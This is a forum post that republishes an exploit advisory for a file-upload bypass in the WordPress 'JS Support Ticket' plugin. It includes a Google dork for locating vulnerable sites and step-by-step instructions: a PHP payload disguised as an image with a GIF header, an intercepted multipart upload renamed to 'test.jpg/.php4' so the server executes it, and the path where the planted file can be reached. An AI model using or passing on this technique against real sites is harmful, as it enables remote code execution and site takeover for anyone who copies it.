Wordpress "Js Support Ticket" File Upload Bypass Extensions

1 reply [Last post]
E1.Coders
E1.Coders's picture
Offline
Neophyte
Joined: 2015/11/22

# Exploit Title: [

Wordpress "Js Support Ticket" File Upload Bypass Extensions]
# Google Dork: [inurl:/js-support-ticket-controlpanel/]
# Date: [3-12-2015]
# Exploit Author: [Mgm-Eg]
# Vendor Homepage: [http://joomsky.com/products/js-supprot-ticket-wp.html]
# Version: [1.X.X]
# Contact: [https://ask.fm/m1g1m]

---------------
1- Description |
---------------
When you open ticket you can upload Attachments only File Extension Type (doc,docx,odt,pdf,txt,png,jpeg,jpg)
but you can bypass it and upload another extensions .

--------------------------------------
2- |Proof of Concept|
--------------------------------------
Use Notepad++ open new file ,
Add
[ GIF89a;

<?php phpinfo(); ?> #you can replace this code to your code

]

" save file as test.jpg "

Open ticket page and Complete the required fields , and upload your [test.jpg]

Use Http Live Header , Open the request and edit file name from "test.jpg" to "test.jpg/.php4" and delete "GIF89a;"

example :
-----------------------------319722301512393\r\n
Content-Disposition: form-data; name="filename[]"; filename="test.jpg/.php4"\r\n
Content-Type: image/jpeg\r\n
\r\n
\r\n
<?php phpinfo(); ?>\r\n
-----------------------------319722301512393\r\n

#File will be visible:
http://wordpress_site/wp-content/plugins/js-support-ticket/jssupporttick...
#also check your email to know your path file , or open my tickets to see all tickets you have sent to know your path file .

# 0day.today [2015-12-09] #

IT Security Researcher , Consultant Security Analiser , Hacker & ...